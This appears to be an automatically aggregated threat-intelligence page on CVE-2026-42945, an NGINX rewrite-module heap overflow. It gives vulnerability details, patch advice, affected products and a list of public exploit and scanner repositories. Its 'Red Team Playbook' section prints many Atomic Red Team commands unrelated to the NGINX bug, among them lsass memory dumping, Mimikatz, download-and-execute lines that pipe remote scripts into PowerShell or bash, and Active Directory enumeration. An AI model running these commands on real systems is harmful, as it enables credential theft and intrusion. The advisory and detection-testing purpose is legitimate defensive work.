CVE-2026-42945
Overview
This vulnerability is a heap buffer overflow occurring in the ngx_http_rewrite_module of F5 NGINX Plus and NGINX Open Source. It arises when the rewrite directive is followed by another rewrite, if, or set directive using an unnamed PCRE capture group (e.g., $1, $2) combined with a replacement string containing a question mark (?). The flaw is rooted in improper handling of regular expression captures during HTTP request processing within the rewrite module.
Vulnerability Description
NGINX Plus and NGINX Open Source have a vulnerability in the ngx_http_rewrite_module module. This vulnerability exists when the rewrite directive is followed by a rewrite, if, or set directive and an unnamed Perl-Compatible Regular Expression (PCRE) capture (for example, $1, $2) with a replacement string that includes a question mark (?). An unauthenticated attacker along with conditions beyond its control can exploit this vulnerability by sending crafted HTTP requests. This may cause a heap buffer overflow in the NGINX worker process leading to a restart. Additionally, attackers can execute code on systems with Address Space Layout Randomization (ASLR) disabled or when the attacker can bypass ASLR. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
Impact
An unauthenticated attacker can exploit this vulnerability remotely by sending specially crafted HTTP requests to cause a heap buffer overflow, resulting in worker process crashes and potential denial of service. In environments where Address Space Layout Randomization (ASLR) is disabled or can be bypassed, the attacker may achieve remote code execution, leading to full system compromise. This can disrupt service availability and allow unauthorized control over affected systems without any user interaction or credentials.
Solution
F5 Networks has released security advisories detailing patches for affected NGINX Plus versions, including version 4.8.0 and others under active support. Users should apply the updates as specified in the vendor advisory K000161019 available at https://my.f5.com/manage/s/article/K000161019. Systems running versions that have reached End of Technical Support are not evaluated and should be upgraded to supported releases. No workaround is documented; patching is the recommended mitigation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the ngx_http_rewrite_module of NGINX Plus and NGINX Open Source is a critical issue that arises from improper handling of Perl-Compatible Regular Expressions (PCRE) during the processing of rewrite directives. Specifically, the vulnerability manifests when a rewrite directive is followed by another rewrite, if, or set directive that utilizes unnamed PCRE captures (like $1, $2) within a replacement string containing a question mark (?). This flaw can lead to a heap buffer overflow, which occurs when data exceeds the allocated buffer size, potentially corrupting adjacent memory. The consequences of such corruption can include application crashes or unexpected behavior, as the NGINX worker process may be forced to restart, disrupting service availability.
Exploitation of this vulnerability can occur through crafted HTTP requests sent by an unauthenticated attacker. The attacker must leverage specific conditions, such as the presence of a vulnerable configuration that includes the problematic rewrite directive structure. Once the crafted request is processed, the heap buffer overflow can be triggered, leading to a crash of the NGINX worker process. In scenarios where Address Space Layout Randomization (ASLR) is disabled or can be bypassed, attackers may gain the ability to execute arbitrary code. This capability significantly increases the risk, as it allows for remote code execution, potentially leading to full system compromise.
The real-world impact of this vulnerability is substantial, particularly for organizations relying on NGINX for web serving and application delivery. The high CVSS score of 9.2 indicates a critical risk level, suggesting that successful exploitation could lead to severe disruptions in service availability and integrity. Businesses may face financial losses due to downtime, damage to reputation, and potential legal ramifications if customer data is compromised. Furthermore, the ability to execute arbitrary code poses a direct threat to the confidentiality of sensitive information, making this vulnerability a priority for organizations using affected versions of NGINX.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, regular security assessments and vulnerability scans should be conducted to identify instances of the vulnerable NGINX configurations. Monitoring logs for unusual patterns or repeated errors related to the rewrite module can also provide early indicators of attempted exploitation. In terms of mitigation, upgrading to the latest supported versions of NGINX that have addressed this vulnerability is crucial. Additionally, organizations should consider implementing security best practices, such as enabling ASLR where possible, employing web application firewalls (WAFs) to filter malicious traffic, and restricting access to the NGINX server to trusted sources only.
In conclusion, the vulnerability in the ngx_http_rewrite_module of NGINX presents a significant threat to organizations that utilize this web server technology. The potential for exploitation through crafted HTTP requests, combined with the severe consequences of a heap buffer overflow, necessitates immediate attention from cybersecurity professionals. By adopting proactive detection and mitigation strategies, businesses can safeguard their systems against this critical vulnerability, ensuring the integrity and availability of their web services.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2026-42945, accompanied by the emergence of multiple new proof-of-concept exploits publicly available on GitHub. This development significantly broadens the attack surface by lowering the technical barrier for adversaries to weaponize the vulnerability. Our telemetry indicates that threat actors are increasingly incorporating these exploits into their toolkits, suggesting a shift from theoretical risk to active exploitation in the wild. The elevation of the CVSS score to 8.1 reflects the growing consensus on the vulnerability’s criticality, while the rise in EPSS score, though still low, signals an upward trend in exploit likelihood. For defenders, this means that passive monitoring is no longer sufficient; the rapid proliferation of exploit code increases the probability of opportunistic attacks, particularly against unpatched NGINX Plus and Open Source deployments. Consequently, the threat level has escalated from a latent vulnerability to an imminent operational risk, necessitating heightened vigilance across network and application security controls.
Update 2 — June 07, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2026-42945, evidenced by a substantial surge in telemetry alerts. This increase coincides with the emergence of multiple new proof-of-concept exploits publicly available on code-sharing platforms, broadening the attacker toolkit and lowering the barrier for exploitation. Despite a concurrent decline in the EPSS score, which suggests a modest reduction in overall exploit probability, the rapid proliferation of diverse exploit variants signals heightened adversary interest and operational activity. For defenders, this evolving landscape underscores an elevated threat posture where opportunistic exploitation is increasingly feasible, particularly against environments that remain unpatched or inadequately monitored. Consequently, the risk level for CVE-2026-42945 should be considered elevated from a latent vulnerability to an active and pressing threat, necessitating ongoing vigilance in detection and response capabilities.
Affected Products (8)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
F5 | Dos | All |
cpe:2.3:a:f5:dos:*:*:*:*:*:nginx:*:*
|
|
|
F5 | Dos | 4.8.0 |
cpe:2.3:a:f5:dos:4.8.0:*:*:*:*:nginx:*:*
|
|
|
F5 | Nginx Gateway Fabric | All |
cpe:2.3:a:f5:nginx_gateway_fabric:*:*:*:*:*:*:*:*
|
|
|
F5 | Nginx Ingress Controller | All |
cpe:2.3:a:f5:nginx_ingress_controller:*:*:*:*:*:*:*:*
|
|
|
F5 | Nginx Instance Manager | All |
cpe:2.3:a:f5:nginx_instance_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Nginx Open Source | All |
cpe:2.3:a:f5:nginx_open_source:*:*:*:*:*:*:*:*
|
|
|
F5 | Nginx Plus | All |
cpe:2.3:a:f5:nginx_plus:*:*:*:*:*:*:*:*
|
|
|
F5 | Waf | All |
cpe:2.3:a:f5:waf:*:*:*:*:*:nginx:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (48)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
DepthFirstDisclosures/Nginx-Rift
exploit for CVE-2026-42945
|
DepthFirstDisclosures | 873 | 163 | 2026-05-12 | View |
|
cipherspy/CVE-2026-42945-POC
exploit for CVE-2026-42945
|
cipherspy | 44 | 11 | 2026-05-14 | View |
|
friparia/NGINX_RIFT_SCAN_CVE_2026_42945
Nginx Rewrite CVE Scan(CVE-2026-42945 nginx-rift CVE-2026-9256)
|
friparia | 32 | 8 | 2026-05-14 | View |
|
p3Nt3st3r-sTAr/CVE-2026-42945-POC
|
p3Nt3st3r-sTAr | 15 | 10 | 2026-05-14 | View |
|
rheodev/CVE-2026-42945
NGINX Rift 漏洞分析与复现
|
rheodev | 19 | 5 | 2026-05-14 | View |
|
MateusVerass/nGixshell
nginx CVE scanner + RCE exploit framework (CVE-2026-42945 + 16 others)
|
MateusVerass | 16 | 7 | 2026-05-16 | View |
|
oseasfr/Scanner_CVE_2026-42945
Script Python para detecção de instâncias Nginx vulneráveis ao CVE-2026-42945 em IPs, CIDRs e ASNs.
|
oseasfr | 18 | 1 | 2026-05-15 | View |
|
jelasin/CVE-2026-42945
|
jelasin | 4 | 4 | 2026-05-15 | View |
|
nu0l/NGINX-Rift
CVE-2026-42945 NGINX 堆溢出漏洞扫描与验证工具
|
nu0l | 5 | 1 | 2026-05-25 | View |
|
bamov970/CVE-2026-42945-Nginx-RCE-bypass-ASLR
CVE-2026-42945 turns a 17-year-old NGINX rewrite bug into remote code execution — even with ASLR on, by chaining the hea...
|
bamov970 | 5 | 0 | 2026-05-25 | View |
|
nanwinata/nginxrift-CVE-2026-42945
|
nanwinata | 2 | 3 | 2026-05-14 | View |
|
gagaltotal/CVE-2026-42945-NGINX-Rift-Toolkit
CVE-2026-42945 - NGINX Rift Toolkit
|
gagaltotal | 3 | 1 | 2026-05-20 | View |
|
strivepan/Nginx_cve-2026-42945-scanner-gui
Bulk scanning + one-click vulnerability exploitation
|
strivepan | 3 | 0 | 2026-06-03 | View |
|
0xBlackash/CVE-2026-42945
CVE-2026-42945
|
0xBlackash | 2 | 1 | 2026-05-14 | View |
|
iammerrida-source/nginx-rift-detect
Behavioral detection script for CVE-2026-42945 (NGINX Rift) — heap overflow in ngx_http_rewrite_module. No RCE, crash-ba...
|
iammerrida-source | 3 | 0 | 2026-05-15 | View |
|
tal7aouy/nginx-cve-2026-42945
🛡️ Script to test for NGINX CVE-2026-42945
|
tal7aouy | 3 | 0 | 2026-05-17 | View |
|
josephfelix/CVE-2026-42945-nginx-rift
Repository for studying the CVE-2026-42945 vulnerability in nginx < 1.30
|
josephfelix | 1 | 1 | 2026-05-25 | View |
|
ChamsBouzaiene/ai-vuln-rediscovery-nginx-cve-2026-42945
|
ChamsBouzaiene | 0 | 2 | 2026-05-14 | View |
|
dinosn/cve-2026-42945-nginx32-lab
CVE-2026-42945 nginx 32-bit exploit lab ASLR enabled
|
dinosn | 1 | 1 | 2026-05-16 | View |
|
hnytgl/CVE-2026-42945
这是一个面向防守和内网排查的 CVE-2026-42945 静态检测工具,用于检查 NGINX ngx_http_rewrite_module 相关配置是否存在高风险 rewrite 组合。
|
hnytgl | 1 | 0 | 2026-05-18 | View |
|
simota/nginx-rift-scanner
Detect-only scanner for CVE-2026-42945 (NGINX Rift), a heap overflow in ngx_http_rewrite_module. Version detection + ngi...
|
simota | 1 | 0 | 2026-06-04 | View |
|
F2u0a0d3/CVE-2026-42945-nginx-rift-poc
PoC for CVE-2026-42945 (nginx Rift) — heap buffer overflow in ngx_http_rewrite_module. Includes detect/probe/exploit mod...
|
F2u0a0d3 | 1 | 0 | 2026-05-22 | View |
|
realityone/cve-2026-42945-scan
Scan your NGINX configuration to determine whether it is affected by CVE-2026-42945.
|
realityone | 1 | 0 | 2026-05-14 | View |
|
forxiucn/nginx-cve-2026-42945-poc
|
forxiucn | 1 | 0 | 2026-05-15 | View |
|
hnytgl/cve-2026-42945
|
hnytgl | 1 | 0 | 2026-05-18 | View |
|
Renison-Gohel/CVE-2026-42945-NGINX-Rift
|
Renison-Gohel | 1 | 0 | 2026-05-17 | View |
|
RedCrazyGhost/CVE-2026-42945
|
RedCrazyGhost | 1 | 0 | 2026-05-19 | View |
|
yusufdalbudak/CVE-2026-42945
|
yusufdalbudak | 0 | 1 | 2026-05-20 | View |
|
chenqin231/CVE-2026-42945
CVE-2026-42945: nginx-rift vulnerability analysis and detection script
|
chenqin231 | 1 | 0 | 2026-05-15 | View |
|
aratane/CVE-2026-42945
A flaw was found in NGINX, specifically within the ngx_http_rewrite_module. An unauthenticated attacker can exploit this...
|
aratane | 0 | 0 | 2026-07-01 | View |
|
azilRababe/CVE-2026-42945
Technical analysis of CVE-2026-42945 (NGINX Rift), a critical heap buffer overflow in NGINX's rewrite engine caused by a...
|
azilRababe | 0 | 0 | 2026-06-22 | View |
|
hulina9900-boop/DIY-CVE-2026-42945-POC
|
hulina9900-boop | 0 | 0 | 2026-06-17 | View |
|
sec-sys/CVE-2026-42945-Reverse-Shell-POC
Python RCE PoC with reverse-shell listener for CVE-2026-42945 (NGINX Rift)
|
sec-sys | 0 | 0 | 2026-06-14 | View |
|
LiaoZiqi-GZFLS/CVE-2026-42945
CVE-2026-42945 Nginx Rift
|
LiaoZiqi-GZFLS | 0 | 0 | 2026-06-10 | View |
|
jenniferreire26/CVE-2026-42945
|
jenniferreire26 | 0 | 0 | 2026-06-09 | View |
|
limo57640-crypto/nginx-rift-detector
Free NGINX Rift CVE-2026-42945 detector for version, rewrite config, ASLR, crash logs, and exploitation indicators.
|
limo57640-crypto | 0 | 0 | 2026-05-16 | View |
|
lowilol/CVE-2026-42945-NGINX-Rift-Check-Script
|
lowilol | 0 | 0 | 2026-06-03 | View |
|
quantumworld-dpdns-io/CVE-2026-42945
|
quantumworld-dpdns-io | 0 | 0 | 2026-05-28 | View |
|
niekaicheng/CVE-2026-42945_NGINX_Rift
|
niekaicheng | 0 | 0 | 2026-05-26 | View |
|
karakapaku43/CVE-2026-42945
|
karakapaku43 | 0 | 0 | 2026-05-25 | View |
|
Ahmed-Soli/ingress-nginx-cve-2026-42945-backport
This repository documents a defensive backport workflow for teams running ingress-nginx controller images that still bun...
|
Ahmed-Soli | 0 | 0 | 2026-05-25 | View |
|
webdev75950-ux/nginx-rce-cve-2026-42945
|
webdev75950-ux | 0 | 0 | 2026-05-23 | View |
|
fkj-src/fix_nginx_cve_2026_42945
NGINX CVE-2026-42945 一键修复脚本
|
fkj-src | 0 | 0 | 2026-05-19 | View |
|
soksofos/wazuh-nginx-cve-2026-42945-sca-lab
Centralized Wazuh SCA Assessment for CVE-2026-42945 on NGINX Servers
|
soksofos | 0 | 0 | 2026-05-15 | View |
|
byezero/nginx-cve-2026-42945-check
|
byezero | 0 | 0 | 2026-05-15 | View |
|
imSre9/CVE-2026-42945
|
imSre9 | 0 | 0 | 2026-05-19 | View |
|
sibersan/web-server-audit_CVE-2026-42945
Trigger-aware web server CVE audit for nginx and Apache. Goes beyond version matching by checking whether the vulnerable...
|
sibersan | 0 | 0 | 2026-05-16 | View |
|
BarAppTeam/nginx-cve-fix
Source-built nginx 1.25.5 container with backported CVE-2026-42945 fix, OpenSSL bump, full provenance chain, and VEX att...
|
BarAppTeam | 0 | 0 | 2026-05-16 | View |
Threat Feed
31 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Active exploitation confirmed — vendor: F5, product: dos
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Web Server
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (10)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-92 | Forced Integer Overflow |
44%
|
High | High |
Red Team Playbook
108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
